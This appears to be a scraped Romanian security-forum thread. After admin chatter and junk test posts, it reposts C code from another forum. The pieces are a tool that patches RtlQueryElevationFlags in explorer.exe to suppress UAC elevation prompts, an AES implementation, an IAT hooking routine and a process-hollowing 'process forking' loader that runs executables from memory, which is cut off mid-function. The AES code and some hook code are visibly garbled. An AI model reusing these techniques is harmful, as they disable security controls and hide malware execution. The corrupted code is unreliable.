Nytro

Fixed. Alta problema majora? Stiu, trebuie facute multe modificari minore, culori sau alte rahaturi, dar momentan sa scapam de problemele importante.

S-a facut un mic upgrade, au fost facute ceva schimbari, insa nu sunt prea "vizibile". Ideea e ca pot sa apara diverse probleme si ne-ar fi util daca ne-ati spune daca apare vreo problema. Stim ca sunt probleme legate de template, cand vom avea timp ne vom ocupa. Informativ: Members: 72,161 SELECT Count ( * ) FROM `user` Count(*) 72162

<b>Pula-n pizda</b> dwfdsfdsfsf

dfsdfsd

Muie vBulletin

fdgdfgdfg">sdfsdfdsf

">

[h=1]Disable UAC elevation dialog by patching RtlQueryElevationFlags in Windows Explorer[/h]Author: [h=3]rohitab[/h] This post describes a method to run programs like regedit.exe without displaying the UAC elevation dialog. When you run a program using Windows Explorer, it calls CreateProcess, which in turn calls CreateProcessInternal. On operating systems with UAC, CreateProcessInternal calls RtlQueryElevationFlags to determine if the UAC elevation dialog should be displayed. Here is a screenshot from API Monitor showing the callstack for RtlQueryElevationFlags RtlQueryElevationFlags returns flags indicating the state of UAC. The following flags are supported: #define ELEVATION_UAC_ENABLED 0x01 #define ELEVATION_VIRTUALIZATION_ENABLED 0x02 #define ELEVATION_INSTALLER_DETECTION_ENABLED 0x04 See UnDoc'd for documentation on this undocumented API. Here is a disassembly of RtlQueryElevationFlags on Windows 7 x64 RtlQueryElevationFlags: 000000007700B850 C7 01 00 00 00 00 mov dword ptr [rcx], 0 000000007700B856 F6 04 25 F0 02 FE 7F 02 test byte ptr [7FFE02F0h],2 000000007700B85E 74 06 je RtlQueryElevationFlags+16h (7700B866h) 000000007700B860 C7 01 01 00 00 00 mov dword ptr [rcx],1 ; ELEVATION_UAC_ENABLED 000000007700B866 F6 04 25 F0 02 FE 7F 04 test byte ptr [7FFE02F0h],4 000000007700B86E 74 03 je RtlQueryElevationFlags+23h (7700B873h) 000000007700B870 83 09 02 or dword ptr [rcx],2 ; ELEVATION_VIRTUALIZATION_ENABLED 000000007700B873 F6 04 25 F0 02 FE 7F 08 test byte ptr [7FFE02F0h],8 000000007700B87B 74 03 je RtlQueryElevationFlags+30h (7700B880h) 000000007700B87D 83 09 04 or dword ptr [rcx],4 ; ELEVATION_INSTALLER_DETECTION_ENABLED 000000007700B880 33 C0 xor eax,eax 000000007700B882 C3 ret The API reads the value at 7FFE02F0h and sets flags indicating UAC state. In order to disable the UAC elevation dialog, the API needs to be modified so that it does not set any flags. There are multiple ways to do it such as re-routing the API using hotpatching, injecting a DLL, modifying the memory location 7FFE02F0h etc. Since we only need to modify a couple of values, its easier to just patch the API in place. The sample code shown below opens Windows Explorer (explorer.exe), and patches RtlQueryElevationFlags in ntdll.dll. Once patched, the API always returns 0 for the flags regardless of the UAC state. Any processes that are executed after this, will run without displaying the UAC elevation dialog. The code, if run again, will unpatch the API to its original state and restore UAC elevation check. Binaries for both 32-bit and 64-bit are attached to this post. // UAC Elevation Enable/Disable // Copyright © 2011, Rohitab Batra // All rights reserved. #include <tchar.h> #include <stdio.h> #include <Windows.h> #include <TlHelp32.h> // Bytes to patch and offsets for comparison #ifdef _WIN64 #define PATCH_BYTE_1 18 #define PATCH_BYTE_2 34 #define PATCH_BYTE_3 47 #define COMPARE_OFFSET_1 9 #define COMPARE_OFFSET_2 25 #define COMPARE_OFFSET_3 38 #define PATCH_SIZE (PATCH_BYTE_3 - PATCH_BYTE_1 + 1) #define BUFFER_SIZE 48 #else #define PATCH_BYTE_1 22 #define PATCH_BYTE_2 37 #define PATCH_BYTE_3 49 #define COMPARE_OFFSET_1 13 #define COMPARE_OFFSET_2 28 #define COMPARE_OFFSET_3 40 #define PATCH_SIZE (PATCH_BYTE_3 - PATCH_BYTE_1 + 1) #define BUFFER_SIZE 52 #endif DWORD GetExplorerProcessId() { DWORD dwProcessId = 0; HANDLE hProcessSnap; PROCESSENTRY32 pe32; // Create snapshot of running processes hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE) { return 0; } // Iterate through the list to find explorer.exe pe32.dwSize = sizeof(PROCESSENTRY32); if(Process32First(hProcessSnap, &pe32)) { do { if(!_tcsicmp(pe32.szExeFile, _T("explorer.exe"))) { dwProcessId = pe32.th32ProcessID; break; } } while(Process32Next(hProcessSnap, &pe32)); } CloseHandle(hProcessSnap); return dwProcessId; } HMODULE GetNtDllModuleHandle(IN DWORD dwProcessId) { HMODULE hModule = NULL; MODULEENTRY32W me32; // Create a snapshot of modules in the process HANDLE hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessId); if(hModuleSnap == INVALID_HANDLE_VALUE) { _tprintf(_T("ERROR: Failed to retrieve module list.\n\tMake sure you run the 64-bit version on a 64-bit OS.\n")); return FALSE; } // Iterate through the list to find ntdll.dll me32.dwSize = sizeof(me32); if(Module32First(hModuleSnap, &me32)) { do { if(!_tcsicmp(me32.szModule, _T("ntdll.dll"))) { hModule = me32.hModule; break; } } while(Module32Next(hModuleSnap, &me32)); } CloseHandle(hModuleSnap); return hModule; } UINT_PTR GetRtlQueryElevationFlagsRva() { HMODULE hModule = GetModuleHandle(_T("ntdll.dll")); if(!hModule) { return 0; } FARPROC fpFunction = GetProcAddress(hModule, "RtlQueryElevationFlags"); if(!fpFunction) { _tprintf(_T("ERROR: RtlQueryElevationFlags is only available on Windows Vista and later\n")); return 0; } return (UINT_PTR)fpFunction - (UINT_PTR)hModule; } VOID UacElevationDisable(IN DWORD dwProcessId, IN HMODULE hNtDll) { // Get the RVA for RtlQueryElevationFlags UINT_PTR uRtlQueryElevationFlagsRva = GetRtlQueryElevationFlagsRva(); if(!uRtlQueryElevationFlagsRva) { return; } // Open process with permissions to perform virtual memory operations HANDLE hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, dwProcessId); if(!hProcess) { _tprintf(_T("ERROR %u: Cannot open process\n"), GetLastError()); return; } __try { BYTE rgbyBuffer[BUFFER_SIZE]; SIZE_T sizeNumberOfBytesTransfered; LPVOID lpvApiAddress = (LPVOID)((UINT_PTR)hNtDll + uRtlQueryElevationFlagsRva); // Read data in from the start of RtlQueryElevationFlags if(!ReadProcessMemory(hProcess, lpvApiAddress, rgbyBuffer, sizeof(rgbyBuffer), &sizeNumberOfBytesTransfered) || sizeNumberOfBytesTransfered != sizeof(rgbyBuffer)) { _tprintf(_T("ERROR %u: Cannot read memory\n"), GetLastError()); __leave; } // Compare data to make sure it matches what we expect if(*(PUINT64)(rgbyBuffer + COMPARE_OFFSET_1) != 0xC70674027FFE02F0 || *(PUINT64)(rgbyBuffer + COMPARE_OFFSET_2) != 0x830374047FFE02F0 || *(PUINT64)(rgbyBuffer + COMPARE_OFFSET_3) != 0x830374087FFE02F0) { _tprintf(_T("ERROR: Data Mismatch. Cannot Patch API\n"), GetLastError()); __leave; } // Check the current state if(rgbyBuffer[PATCH_BYTE_1] == 0x01 && rgbyBuffer[PATCH_BYTE_2] == 0x02 && rgbyBuffer[PATCH_BYTE_3] == 0x04) { _tprintf(_T("UAC Elevation Check is ON. Turning OFF\n")); } else if(rgbyBuffer[PATCH_BYTE_1] == 0x00 && rgbyBuffer[PATCH_BYTE_2] == 0x00 && rgbyBuffer[PATCH_BYTE_3] == 0x00) { _tprintf(_T("UAC Elevation Check is OFF. Turning ON\n")); } else { _tprintf(_T("UAC Elevation Check is UNKNOWN\n")); __leave; } // Patch bytes rgbyBuffer[PATCH_BYTE_1] ^= 0x01; rgbyBuffer[PATCH_BYTE_2] ^= 0x02; rgbyBuffer[PATCH_BYTE_3] ^= 0x04; LPVOID lpvPatchStartAddress = (LPVOID)((UINT_PTR)lpvApiAddress + PATCH_BYTE_1); // Write patched data back if(WriteProcessMemory(hProcess, lpvPatchStartAddress, rgbyBuffer + PATCH_BYTE_1, PATCH_SIZE, &sizeNumberOfBytesTransfered) && sizeNumberOfBytesTransfered == PATCH_SIZE) { __leave; } // Failed to write; unprotect the memory and retry BOOL bSuccess = FALSE; DWORD dwOldProtect; if(VirtualProtectEx(hProcess, lpvPatchStartAddress, PATCH_SIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect)) { // Retry writing patched data if(WriteProcessMemory(hProcess, lpvPatchStartAddress, rgbyBuffer + PATCH_BYTE_1, PATCH_SIZE, &sizeNumberOfBytesTransfered) && sizeNumberOfBytesTransfered == PATCH_SIZE) { bSuccess = TRUE; } VirtualProtectEx(hProcess, lpvPatchStartAddress, PATCH_SIZE, dwOldProtect, &dwOldProtect); } if(!bSuccess) { _tprintf(_T("ERROR: Cannot write memory\n")); } } __finally { CloseHandle(hProcess); } } int _tmain(int argc, _TCHAR* argv[]) { _tprintf(_T("UAC Elevation Enable/Disable\n© 2011 Rohitab Batra\nAll rights reserved.\nhttp://www.rohitab.com\n\n")); __try { DWORD dwExplorerProcessId = GetExplorerProcessId(); if(!dwExplorerProcessId) { _tprintf(_T("ERROR: Cannot find explorer.exe in the list of running processes\n")); __leave; } HMODULE hExplorerNtDll = GetNtDllModuleHandle(dwExplorerProcessId); if(!hExplorerNtDll) { _tprintf(_T("ERROR: Cannot find ntdll.dll in the explorer.exe\n")); __leave; } UacElevationDisable(dwExplorerProcessId, hExplorerNtDll); } __finally { } _tprintf(_T("Press ENTER to exit")); getchar(); return 0; } A quicker way to test this, without using the above code, is through API Monitor. Launch API Monitor, set a post-call breakpoint on RtlQueryElevationFlags and monitor explorer.exe. Now, run a process that requires elevation, such as regedit.exe. API Monitor will display the breakpoint dialog as shown below. This will run regedit.exe without the UAC elevation dialog. Download: x86: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3332 x64: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3333 Sursa: Disable UAC elevation dialog by patching RtlQueryElevationFlags in Windows Explorer - rohitab.com - Forums

[h=1][C] AES Implementation[/h]Author: [h=3]X-N2O[/h] I joined all the source inside the code tags. If you wanna use it you have the separate files aes.c, aes.h and main.c inside the zip file. Enjoy. // AES Implementation by X-N2O // Started: 15:41:35 - 18 Nov 2009 // Finished: 20:03:59 - 21 Nov 2009 // Logarithm, S-Box, and RCON tables are not hardcoded // Instead they are generated when the program starts // All of the code below is based from the AES specification // You can find it at <a href="http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf" class="bbc_url" title="External link" rel="nofollow external">http://csrc.nist.gov...97/fips-197.pdf</a> // You may use this code as you wish, but do not remove this comment // This is only a proof of concept, and should not be considered as the most efficient implementation #include <stdlib.h> #include <string.h> #include <stdio.h> #define AES_RPOL 0x011b // reduction polynomial (x^8 + x^4 + x^3 + x + 1) #define AES_GEN 0x03 // gf(2^8) generator (x + 1) #define AES_SBOX_CC 0x63 // S-Box C constant #define KEY_128 (128/8) #define KEY_192 (192/8) #define KEY_256 (256/8) #define aes_mul(a, ((a)&&(?g_aes_ilogt[(g_aes_logt[(a)]+g_aes_logt[(])%0xff]:0) #define aes_inv(a) ((a)?g_aes_ilogt[0xff-g_aes_logt[(a)]]:0) unsigned char g_aes_logt[256], g_aes_ilogt[256]; unsigned char g_aes_sbox[256], g_aes_isbox[256]; typedef struct { unsigned char state[4][4]; int kcol; size_t rounds; unsigned long keysched[0]; } aes_ctx_t; void aes_init(); aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen); inline unsigned long aes_subword(unsigned long w); inline unsigned long aes_rotword(unsigned long w); void aes_keyexpansion(aes_ctx_t *ctx); inline unsigned char aes_mul_manual(unsigned char a, unsigned char ; // use aes_mul instead void aes_subbytes(aes_ctx_t *ctx); void aes_shiftrows(aes_ctx_t *ctx); void aes_mixcolumns(aes_ctx_t *ctx); void aes_addroundkey(aes_ctx_t *ctx, int round); void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]); void aes_invsubbytes(aes_ctx_t *ctx); void aes_invshiftrows(aes_ctx_t *ctx); void aes_invmixcolumns(aes_ctx_t *ctx); void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]); void aes_free_ctx(aes_ctx_t *ctx); void init_aes() { int i; unsigned char gen; // build logarithm table and it's inverse gen = 1; for(i = 0; i < 0xff; i++) { g_aes_logt[gen] = i; g_aes_ilogt[i] = gen; gen = aes_mul_manual(gen, AES_GEN); } // build S-Box and it's inverse for(i = 0; i <= 0xff; i++) { char bi; unsigned char inv = aes_inv(i); g_aes_sbox[i] = 0; for(bi = 0; bi < 8; bi++) { // based on transformation 5.1 // could also be done with a loop based on the matrix g_aes_sbox[i] |= ((inv & (1<<bi)?1:0) ^ (inv & (1 << ((bi+4) & 7))?1:0) ^ (inv & (1 << ((bi+5) & 7))?1:0) ^ (inv & (1 << ((bi+6) & 7))?1:0) ^ (inv & (1 << ((bi+7) & 7))?1:0) ^ (AES_SBOX_CC & (1 << bi)?1:0) ) << bi; } g_aes_isbox[g_aes_sbox[i]] = i; } // warning: quickhack g_aes_sbox[1] = 0x7c; g_aes_isbox[0x7c] = 1; g_aes_isbox[0x63] = 0; } aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen) { aes_ctx_t *ctx; size_t rounds; size_t ks_size; switch(keyLen) { case 16: // 128-bit key rounds = 10; break; case 24: // 192-bit key rounds = 12; break; case 32: // 256-bit key rounds = 14; break; defaut: return NULL; } ks_size = 4*(rounds+1)*sizeof(unsigned long); ctx = malloc(sizeof(aes_ctx_t)+ks_size); if(ctx) { ctx->rounds = rounds; ctx->kcol = keyLen/4; memcpy(ctx->keysched, key, keyLen); ctx->keysched[43] = 0; aes_keyexpansion(ctx); } return ctx; } inline unsigned long aes_subword(unsigned long w) { return g_aes_sbox[w & 0x000000ff] | (g_aes_sbox[(w & 0x0000ff00) >> 8] << 8) | (g_aes_sbox[(w & 0x00ff0000) >> 16] << 16) | (g_aes_sbox[(w & 0xff000000) >> 24] << 24); } inline unsigned long aes_rotword(unsigned long w) { // May seem a bit different from the spec // It was changed because unsigned long is represented with little-endian convention on x86 // Should not depend on architecture, but this is only a POC return ((w & 0x000000ff) << 24) | ((w & 0x0000ff00) >> 8) | ((w & 0x00ff0000) >> 8) | ((w & 0xff000000) >> 8); } void aes_keyexpansion(aes_ctx_t *ctx) { unsigned long temp; unsigned long rcon; register int i; rcon = 0x00000001; for(i = ctx->kcol; i < (4*(ctx->rounds+1)); i++) { temp = ctx->keysched[i-1]; if(!(i%ctx->kcol)) { temp = aes_subword(aes_rotword(temp)) ^ rcon; rcon = aes_mul(rcon, 2); } else if(ctx->kcol > 6 && i%ctx->kcol == 4) temp = aes_subword(temp); ctx->keysched[i] = ctx->keysched[i-ctx->kcol] ^ temp; } } inline unsigned char aes_mul_manual(unsigned char a, unsigned char { register unsigned short ac; register unsigned char ret; ac = a; ret = 0; while( { if(b & 0x01) ret ^= ac; ac <<= 1; b >>= 1; if(ac & 0x0100) ac ^= AES_RPOL; } return ret; } void aes_subbytes(aes_ctx_t *ctx) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = g_aes_sbox[ctx->state[x][y]]; } } void aes_shiftrows(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; nstate[x][y] = ctx->state[x][(y+x) & 0x03]; } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_mixcolumns(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 4; i++) { nstate[0][i] = aes_mul(0x02, ctx->state[0][i]) ^ aes_mul(0x03, ctx->state[1][i]) ^ ctx->state[2][i] ^ ctx->state[3][i]; nstate[1][i] = ctx->state[0][i] ^ aes_mul(0x02, ctx->state[1][i]) ^ aes_mul(0x03, ctx->state[2][i]) ^ ctx->state[3][i]; nstate[2][i] = ctx->state[0][i] ^ ctx->state[1][i] ^ aes_mul(0x02, ctx->state[2][i]) ^ aes_mul(0x03, ctx->state[3][i]); nstate[3][i] = aes_mul(0x03, ctx->state[0][i]) ^ ctx->state[1][i] ^ ctx->state[2][i] ^ aes_mul(0x02, ctx->state[3][i]); } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_addroundkey(aes_ctx_t *ctx, int round) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = ctx->state[x][y] ^ ((ctx->keysched[round*4+y] & (0xff << (x*8))) >> (x*8)); } } void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) { int i; // copy input to state for(i = 0; i < 16; i++) ctx->state[i & 0x03][i >> 2] = input[i]; aes_addroundkey(ctx, 0); for(i = 1; i < ctx->rounds; i++) { aes_subbytes(ctx); aes_shiftrows(ctx); aes_mixcolumns(ctx); aes_addroundkey(ctx, i); } aes_subbytes(ctx); aes_shiftrows(ctx); aes_addroundkey(ctx, ctx->rounds); // copy state to output for(i = 0; i < 16; i++) output[i] = ctx->state[i & 0x03][i >> 2]; } void aes_invshiftrows(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; nstate[x][(y+x) & 0x03] = ctx->state[x][y]; } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_invsubbytes(aes_ctx_t *ctx) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = g_aes_isbox[ctx->state[x][y]]; } } void aes_invmixcolumns(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 4; i++) { nstate[0][i] = aes_mul(0x0e, ctx->state[0][i]) ^ aes_mul(0x0b, ctx->state[1][i]) ^ aes_mul(0x0d, ctx->state[2][i]) ^ aes_mul(0x09, ctx->state[3][i]); nstate[1][i] = aes_mul(0x09, ctx->state[0][i]) ^ aes_mul(0x0e, ctx->state[1][i]) ^ aes_mul(0x0b, ctx->state[2][i]) ^ aes_mul(0x0d, ctx->state[3][i]); nstate[2][i] = aes_mul(0x0d, ctx->state[0][i]) ^ aes_mul(0x09, ctx->state[1][i]) ^ aes_mul(0x0e, ctx->state[2][i]) ^ aes_mul(0x0b, ctx->state[3][i]); nstate[3][i] = aes_mul(0x0b, ctx->state[0][i]) ^ aes_mul(0x0d, ctx->state[1][i]) ^ aes_mul(0x09, ctx->state[2][i]) ^ aes_mul(0x0e, ctx->state[3][i]); } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) { int i, j; // copy input to state for(i = 0; i < 16; i++) ctx->state[i & 0x03][i >> 2] = input[i]; aes_addroundkey(ctx, ctx->rounds); for(i = ctx->rounds-1; i >= 1; i--) { aes_invshiftrows(ctx); aes_invsubbytes(ctx); aes_addroundkey(ctx, i); aes_invmixcolumns(ctx); } aes_invshiftrows(ctx); aes_invsubbytes(ctx); aes_addroundkey(ctx, 0); // copy state to output for(i = 0; i < 16; i++) output[i] = ctx->state[i & 0x03][i >> 2]; } void aes_free_ctx(aes_ctx_t *ctx) { free(ctx); } int main(int argc, char *argv[]) { unsigned char key[KEY_128] = "uber strong key!"; unsigned char ptext[16] = "Attack at dawn!"; unsigned char ctext[16]; unsigned char decptext[16]; aes_ctx_t *ctx; init_aes(); ctx = aes_alloc_ctx(key, sizeof(key)); if(!ctx) { perror("aes_alloc_ctx"); return EXIT_FAILURE; } aes_encrypt(ctx, ptext, ctext); aes_decrypt(ctx, ctext, decptext); puts(decptext); aes_free_ctx(ctx); return EXIT_SUCCESS; } In the attached zip you will also find the compiled ELF binary. Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=2875 Sursa: [C] AES Implementation - rohitab.com - Forums

[C] IAT Hooker ( not the bad kind ) Author: [h=3]Kazan[/h] So basically I got interested in the PE file structure and came up with this, a local function hooker. It basically finds the address of the a function from a specific loaded module and changes the address to a function defined by the user. This is interesting and fun with DLL injections and the like.Plus, it's just one call to the the whole work : FARPROC WINAPI ReplaceIATEntry( HMODULE hModuleHookFrom , const char * szModuleFileName , const char * szFunctionName , FARPROC frNewProc); #include <stdio.h> #include <windows.h> LPVOID IsDosStub(LPVOID Data); FARPROC WINAPI ReplaceIATEntry( HMODULE hModuleHookFrom , const char * szModuleFileName , const char * szFunctionName , FARPROC frNewProc); FARPROC Original_MessageBox=0;/*original address*/ FARPROC MessageBox_B ( HWND h_wind,LPCSTR lp_mess ,LPCSTR lp_cap,UINT i_ses ) { FARPROC a=Original_MessageBox; FARPROC b = a(h_wind, lp_mess,"Hooked etc.",0); /* return Original_MessageBox ( h_wind, lp_mess,"hooked etc.", 0 );*/ return b; } int main() { Original_MessageBox = ReplaceIATEntry(GetModuleHandle(0),"user32.dll","MessageBoxA",MessageBox_; if ( Original_MessageBox != 0 ) MessageBox(0,"Success",0,0); else return GetLastError(); } LPVOID IsDosStub(LPVOID data) { IMAGE_DOS_HEADER*Doshdr=data; if (IsBadReadPtr(Doshdr,sizeof(IMAGE_DOS_HEADER))) return 0; if (Doshdr->e_magic != IMAGE_DOS_SIGNATURE) return 0; return (data +Doshdr->e_lfanew); } FARPROC WINAPI ReplaceIATEntry( HMODULE hModuleHookFrom , const char * szModuleFileName , const char * szFunctionName , FARPROC frNewProc) { FARPROC frOriginalProc ; IMAGE_DOS_HEADER * Doshdr ; IMAGE_NT_HEADERS * ImageNt ; IMAGE_IMPORT_DESCRIPTOR * ImageImpDescriptor ; IMAGE_THUNK_DATA * ImageThunk ; DWORD dwRet , dwOld , dw; BOOLEAN bModuleFound=FALSE; if ( hModuleHookFrom == NULL) return 0; if ( IsBadCodePtr(frNewProc ) ) { #ifdef DEBUG printf("Invalid code pointer %08X\r\n",frNewProc); #endif return 0; } frOriginalProc = GetProcAddress ( GetModuleHandle ( szModuleFileName ) , szFunctionName ); if (!frOriginalProc) { #ifdef DEBUG puts("Function inexistant in module"); #endif return 0; } #ifdef DEBUG printf("Original function address %08X\r\n",frOriginalProc); #endif Doshdr = (unsigned char*)hModuleHookFrom; if ( IsBadReadPtr(Doshdr, sizeof(IMAGE_DOS_HEADER)) ) /* is valid image*/ return 0; ImageNt = IsDosStub(Doshdr); if ( ImageNt == 0 ) return 0; if ( IsBadReadPtr(ImageNt, sizeof(IMAGE_NT_HEADERS)) ) /* is valid image*/ return 0; if ( ImageNt->Signature != IMAGE_NT_SIGNATURE ) return 0; ImageImpDescriptor = (unsigned char*)Doshdr+ImageNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; if (ImageImpDescriptor == 0 ) return 0; while ( ImageImpDescriptor->Name ) { char * szModuleName = (unsigned char*) Doshdr + ImageImpDescriptor->Name; #ifdef DEBUG printf("Current Module : %s\r\n",pszModName ); #endif if ( stricmp(szModuleName, szModuleFileName) == 0 ) { bModuleFound++; break; } ImageImpDescriptor++; } if ( !bModuleFound ) return 0; ImageThunk = (unsigned char*)Doshdr + ImageImpDescriptor->FirstThunk ; while ( ImageThunk->u1.Function ) { #ifdef DEBUG printf(" Current Function address %08X\r\n", ImageThunk->u1.Function ); #endif if ( (unsigned char*)ImageThunk->u1.Function == (unsigned char*)frOriginalProc ) { #ifdef DEBUG printf(" Original function address call found ( %08X ) \r\n" , frOriginalProc ); #endif if (IsBadWritePtr( &ImageThunk->u1.Function, 4) )/*unacceptable if checks are run*/ { dwRet = VirtualProtect( &ImageThunk->u1.Function, 4, PAGE_EXECUTE_READWRITE, &dwOld ); /*make writable*/ ImageThunk->u1.Function = (DWORD)(unsigned char*)frOriginalProc; dwRet = VirtualProtect( &ImageThunk->u1.Function, 4, dwOld, &dw ); } else ImageThunk->u1.Function = (DWORD)(unsigned char*)frNewProc;/*damn typecasts*/ return frOriginalProc; } ImageThunk++; } return 0; } Sursa: IAT Hooker ( not the bad kind ) - rohitab.com - Forums

Dynamic Process Forking of Portable Executable //-------------------------------------------------------- // Dynamic Process Forking of Portable Executable // Author : Vrillon / Venus // Date : 07/14/2008 //-------------------------------------------------------- /*********************************************************/ /* With this header, you can create and run a process */ /* from memory and not from a file. */ /*********************************************************/ #ifdef WIN32 #include <windows.h> #else #error Process Forking Requires a Windows Operating System #endif #include <stdio.h> ///////////////////////////////////////////////////////////// // NtUnmapViewOfSection (ZwUnmapViewOfSection) // Used to unmap a section from a process. typedef long int (__stdcall* NtUnmapViewOfSectionF)(HANDLE,PVOID); NtUnmapViewOfSectionF NtUnmapViewOfSection = (NtUnmapViewOfSectionF)GetProcAddress(LoadLibrary("ntdll.dll"),"NtUnmapViewOfSection"); ///////////////////////////////////////////////////////////// // Fork Process // Dynamically create a process based on the parameter 'lpImage'. The parameter should have the entire // image of a portable executable file from address 0 to the end. bool ForkProcess(LPVOID lpImage) { // Variables for Process Forking long int lWritten; long int lHeaderSize; long int lImageSize; long int lSectionCount; long int lSectionSize; long int lFirstSection; long int lPreviousProtection; long int lJumpSize; bool bReturnValue; LPVOID lpImageMemory; LPVOID lpImageMemoryDummy; IMAGE_DOS_HEADER dsDosHeader; IMAGE_NT_HEADERS ntNtHeader; IMAGE_SECTION_HEADER shSections[512 * 2]; PROCESS_INFORMATION piProcessInformation; STARTUPINFO suStartUpInformation; CONTEXT cContext; // Variables for Local Process FILE* fFile; char* pProcessName; long int lFileSize; long int lLocalImageBase; long int lLocalImageSize; LPVOID lpLocalFile; IMAGE_DOS_HEADER dsLocalDosHeader; IMAGE_NT_HEADERS ntLocalNtHeader; ///////////////////////////////////////////////////////////////// // End Variable Definition bReturnValue = false; pProcessName = new char[MAX_PATH]; ZeroMemory(pProcessName,MAX_PATH); // Get the file name for the dummy process if(GetModuleFileName(NULL,pProcessName,MAX_PATH) == 0) { delete [] pProcessName; return bReturnValue; } // Open the dummy process in binary mode fFile = fopen(pProcessName,"rb"); if(!fFile) { delete [] pProcessName; return bReturnValue; } fseek(fFile,0,SEEK_END); // Get file size lFileSize = ftell(fFile); rewind(fFile); // Allocate memory for dummy file lpLocalFile = new LPVOID[lFileSize]; ZeroMemory(lpLocalFile,lFileSize); // Read memory of file fread(lpLocalFile,lFileSize,1,fFile); // Close file fclose(fFile); // Grab the DOS Headers memcpy(&dsLocalDosHeader,lpLocalFile,sizeof(dsLocalDosHeader)); if(dsLocalDosHeader.e_magic != IMAGE_DOS_SIGNATURE) { delete [] pProcessName; delete [] lpLocalFile; return bReturnValue; } // Grab NT Headers memcpy(&ntLocalNtHeader,(LPVOID)((long int)lpLocalFile+dsLocalDosHeader.e_lfanew),sizeof(dsLocalDosHeader)); if(ntLocalNtHeader.Signature != IMAGE_NT_SIGNATURE) { delete [] pProcessName; delete [] lpLocalFile; return bReturnValue; } // Get Size and Image Base lLocalImageBase = ntLocalNtHeader.OptionalHeader.ImageBase; lLocalImageSize = ntLocalNtHeader.OptionalHeader.SizeOfImage; // Deallocate delete [] lpLocalFile; // Grab DOS Header for Forking Process memcpy(&dsDosHeader,lpImage,sizeof(dsDosHeader)); if(dsDosHeader.e_magic != IMAGE_DOS_SIGNATURE) { delete [] pProcessName; return bReturnValue; } // Grab NT Header for Forking Process memcpy(&ntNtHeader,(LPVOID)((long int)lpImage+dsDosHeader.e_lfanew),sizeof(ntNtHeader)); if(ntNtHeader.Signature != IMAGE_NT_SIGNATURE) { delete [] pProcessName; return bReturnValue; } // Get proper sizes lImageSize = ntNtHeader.OptionalHeader.SizeOfImage; lHeaderSize = ntNtHeader.OptionalHeader.SizeOfHeaders; // Allocate memory for image lpImageMemory = new LPVOID[lImageSize]; ZeroMemory(lpImageMemory,lImageSize); lpImageMemoryDummy = lpImageMemory; lFirstSection = (long int)(((long int)lpImage+dsDosHeader.e_lfanew) + sizeof(IMAGE_NT_HEADERS)); memcpy(shSections,(LPVOID)(lFirstSection),sizeof(IMAGE_SECTION_HEADER)*ntNtHeader.FileHeader.NumberOfSections); memcpy(lpImageMemoryDummy,lpImage,lHeaderSize); // Get Section Alignment if((ntNtHeader.OptionalHeader.SizeOfHeaders % ntNtHeader.OptionalHeader.SectionAlignment) == 0) { lJumpSize = ntNtHeader.OptionalHeader.SizeOfHeaders; } else { lJumpSize = (ntNtHeader.OptionalHeader.SizeOfHeaders/ntNtHeader.OptionalHeader.SectionAlignment); lJumpSize += 1; lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment); } lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize); // Copy Sections To Buffer for(lSectionCount = 0; lSectionCount < ntNtHeader.FileHeader.NumberOfSections; lSectionCount++) { lJumpSize = 0; lSectionSize = shSections[lSectionCount].SizeOfRawData; memcpy(lpImageMemoryDummy,(LPVOID)((long int)lpImage + shSections[lSectionCount].PointerToRawData),lSectionSize); if((shSections[lSectionCount].Misc.VirtualSize % ntNtHeader.OptionalHeader.SectionAlignment)==0) { lJumpSize = shSections[lSectionCount].Misc.VirtualSize; } else { lJumpSize = (shSections[lSectionCount].Misc.VirtualSize/ntNtHeader.OptionalHeader.SectionAlignment); lJumpSize += 1; lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment); } lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize); } ZeroMemory(&suStartUpInformation,sizeof(STARTUPINFO)); ZeroMemory(&piProcessInformation,sizeof(PROCESS_INFORMATION)); ZeroMemory(&cContext,sizeof(CONTEXT)); suStartUpInformation.cb = sizeof(suStartUpInformation); // Create Process if(CreateProcess(NULL,pProcessName,NULL,NULL,false,CREATE_SUSPENDED,NULL,NULL,&suStartUpInformation,&piProcessInformation)) { cContext.ContextFlags = CONTEXT_FULL; GetThreadContext(piProcessInformation.hThread,&cContext); // Check image base and image size if(lLocalImageBase == (long 